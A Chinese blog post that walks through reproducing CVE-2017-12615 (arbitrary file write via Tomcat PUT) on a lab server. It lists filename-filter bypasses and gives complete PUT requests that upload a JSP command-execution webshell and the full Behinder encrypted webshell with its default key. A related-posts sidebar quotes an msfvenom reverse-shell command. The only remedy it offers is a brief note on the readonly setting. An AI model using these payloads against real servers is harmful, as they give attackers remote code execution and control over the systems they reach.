TOMCAT PUT方法任意写文件(CVE-2017-12615)-靶场复现

最新推荐文章于 2024-05-17 09:16:23 发布
最新推荐文章于 2024-05-17 09:16:23 发布
阅读量566 收藏 1
点赞数 1
文章标签: tomcat 服务器 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66376444/article/details/129984657
版权

一、漏洞信息
tomcat put方法任意写文件介绍:
当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。

2、漏洞原理:
漏洞本质Tomcat配置了可写(readonly=false),导致我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作。
这里还有一个细节:
其实tomcat会对上传的文件内容进行限制,比如说禁止上传 .jpg 后缀的文件,只不过,这个过滤机制可以通过一些windows 或着 linux的特性绕过。

3、影响版本:
CVE-2017-12616影响范围:Apache Tomcat 7.0.0 - 7.0.80
CVE-2017-12615影响范围:Apache Tomcat 7.0.0 - 7.0.79
从 5.x 到 9.x 均受到影响
本次测试版本:Tomcat版本:8.5.19

4、绕过上传方式
①Windows下 Windows下不允许文件以空格结尾

PUT /x.jsp%20 HTTP/1.1

②windows会被自动去掉末尾空格 Windows NTFS流

PUT /x.jsp::$DATA HTTP/1.1

③Linux下/在文件名中是非法的,会被去除(Linux/Windows)

PUT /x.jsp/ HTTP/1.1

二、漏洞复现
1、进入到tomcat主页进行抓包



2、修改请求协议PUT加文件名,在请求主体内写入可执行代码,点击发送

PUT /pwd5.jsp/ HTTP/1.1
Host: 192.168.1.112:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 374

<%
    if("666".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>


3、命令执行方式:http://127.0.0.1:8080/21.jsp?pwd=666&i=whoami

4、获取webshell
冰蝎自带马,密码:rebeyond

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

修改请求协议PUT加文件名,在请求主体内写入可执行代码,点击发送

PUT /pwd7.jsp/ HTTP/1.1
Host: 192.168.1.112:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 612

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>


上传成功使用冰蝎进行连接
 

三、修复建议
Tomcat配置 readonly=true

wudidaniuniu
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
hikvision_CVE-2017-7921配置文件解密.rar
05-20
该程序可以提取由于授权问题影响的多款Hikvision产品的configfile文件中的管理员账号密码。 具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名configurationFile
漏洞系列--Tomcat-PUT方法任意文件入(CVE-2017-12615)
梦之旅行地
01-14 488
1、漏洞利用前提: Tomcat版本: 7.0.0 - 7.0.81 配置文件conf/web.xml中的readonly设置为false 开启了PUT方法 2、过程: 用burp随意抓一个GET请求包,将GET改为PUT,并上传一个jsp文件 PUT /1.jsp/ HTTP/1.1 Host: 对应的网站host Accept: */* Accept-Language: en User-A...
cve-2017-12615_cmd.py
04-26
CVE-2017-12615的稀有检测脚本,方便使用和测试,本脚本请谨慎使用!
CVE-2017-7921海康威视配置文件解码(configfile解码)
12-11
该程序可以提取由于授权问题影响的多款Hikvision产品的configfile文件中的管理员账号密码。具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。(ps:工具不会使用可以私信我,直接差评的一律自理)
【IIS服务器】IIS服务器常见漏洞
时乙的博客
11-05 4022
文件解析漏洞 1、目录解析漏洞 2、文件名解析漏洞 3、畸形解析漏洞 IIS 短文件漏洞 PUT 任意文件入 IIS是Internet Information Services的缩,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。 IIS目前只适用于Windows系统,不适用于其他操作系统。 文件解析漏洞 1、目录解析漏洞 在 IIS5.x/6.0 中,默认会将**.asp(*.asa、*.cer、*.cdx )目录下的.
TomcatPUT的上传漏洞(CVE-2017-12615)
小小猪的博客
11-19 3514
Tomcat远程代码执行漏洞(CVE-2017-12615) 漏洞描述: 当 Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。 受影响的版本: Apache Tomcat 7.0.0 to 7.0.79 利用条件: Apache
Tomcat PUT 方法任意文件漏洞(CVE-2017-12615)
weixin_47498728的博客
01-06 718
tomcat本身不允许上传 jsp 文件,但是1.jsp/ 加了 / 就不是 jsp 文件,所以文件可以成功上传。系统保存文件时因为不能存在/字符,所以/被忽略了,所以文件名从 1.jsp/ -> 1.jsp,至此jsp文件完成了上传并保存。
【漏洞Tomcat PUT方法任意文件漏洞(CVE-2017-12615)
weixin_42090431的博客
01-02 507
2017年9月19日,Apache Tomcat官方确认并修了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,其中 远程代码执行漏洞(CVE-2017-12615) 影响: Apache Tomcat 7.0.0 - 7.0.79(7.0.81修不完全)
Tomcat PUT方法任意文件漏洞(CVE-2017-12615)
小城的博客
01-11 1346
漏洞概述: • 如果Tomcat开启了PUT方法(默认关闭,有点鸡肋,但是有些页面需要PUT,无法关闭),则有可能存在远程命令执行漏洞,攻击者可以利用PUT方法上传jsp文件,从而造成远程命令执行,getshell等。 漏洞版本: • 7.0.0~7.0.79 漏洞搭建: • 利用vulhub漏洞平台(简单粗暴,一键生成漏洞!)进行快速搭建,cd 到tomcat目录,然后docker-compose up -d • 如能成功进入ip:8080就表示搭建成功,(靶机为8.5.19请忽视,漏洞存在7.0.0~7
Tomcat put任意文件上传
z.mumu的博客
09-10 1218
1.Tomcat8.5.19漏洞 PUT方法任意文件漏洞(CVE-2017-12615) 打开burp尝试put方法任意文件上传 抓取页面,然后将Get方法改成PUT,注意文件名要/文件名/,然后内容直接空一行在下面,返回201。 冰蝎连接 也可以使用msf生成jsp的木马进行连接 msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机ip LPORT=端口 -f raw > shell.jsp 然后msf设置监听访问 最后就是使用有的exp 我
CVE-2017-12615-master.zip
09-04
CVE-2017-12615漏洞利用工具;CVE-2017-12615漏洞利用工具;
【vulhub漏洞】通过 PUT 方法Tomcat 任意文件漏洞 (CVE-2017-12615)-02
书山上的云的博客
01-11 3560
一、漏洞原理 Tomcat设置了权限(readonly=false),导致我们可以向服务器文件CVE-2017-12615:远程代码执行漏洞。只需参数readonly设置为false或者使用参数readonly设置启用WebDAV servlet false。此配置将允许任何未经身份验证的用户上传文件(如WebDAV中所使用的)。 <servlet> <servlet-name>default</servlet-name> <servlet
Tomcat PUT方法任意文件漏洞(CVE-2017-12615)
来到了学渣的博客
08-18 1551
Tomcat启用了HTTP PUT请求方法并且将 readonly 初始化参数由默认值设置为 false,就能执行任意文件入漏洞 Tomcat 7.x版本内web.xml配置文件内默认配置无readonly参数,需要手工添加,所以默认配置条件下不受此漏洞影响。 配置文件为 \conf\web.xml 利用vulhub搭建漏洞环境 目录为tomcat/CVE-2017-12615 环境启动成功 直接构造如下poc PUT /shell1.jsp/ HTTP/1.1 Host:目标ip Accep
Netsparker扫描IIS网站——IIS PUT 任意文件
W小哥
01-13 870
产生的原因 WebDAV允许 入权限打开 实验步骤: 第一步:访问目标网站 第二步:netspareker扫描 设定目标IP地址,点击start scan 稍等一会儿之后,出如下界面 Code Execution via WebDAV是IIS PUT上传漏洞 里面是漏洞利用数据包内容 第三步:制粘贴到burpsuite的Repeater中 继续点击send,发送数据包 ...
网络抓包方式Tomcat- AJP协议文件读取/命令执行漏洞(CVE-2020-1938 / CNVD-2020-10487)
weixin_59280309的博客
02-11 1196
Ghostcat(幽灵猫) 是由长亭科技安全研究员发的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。
TomcatPUT文件上传漏洞(CVE-2017-12615)
weixin_52458793的博客
02-12 1101
详细教程
Tomcat 启动闪退问题解决方案详解
最新发布
学IT,找陈寒
05-17 822
通过本文的介绍,相信读者已经对 Tomcat 启动闪退问题有了更深入的理解,并掌握了解决这些问题的方法。在实际应用中,如果遇到其他未列出的问题,可以结合具体情况进行分析和解决。Tomcat 是一个稳定且强大的 Web 服务器和 Servlet 容器,正确配置和使用能够为项目的开发和部署提供便利。😊🙏Java面试技巧Java面试八股文 - 掌握面试必备知识(目录篇)Java学习路线2023年完整版Java学习路线图AIGC人工智能Chat GPT是什么,初学者怎么使用Chat GPT,需要注意些什么。
cve-2017-12615漏洞
06-28
cve-2017-12615漏洞是Apache Tomcat服务器中的一个远程代码执行漏洞。攻击者可以通过发送特定的HTTP请求来利用该漏洞,从而在服务器上执行任意代码。 要该漏洞,需要满足以下条件: 1. 目标服务器上运行的是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值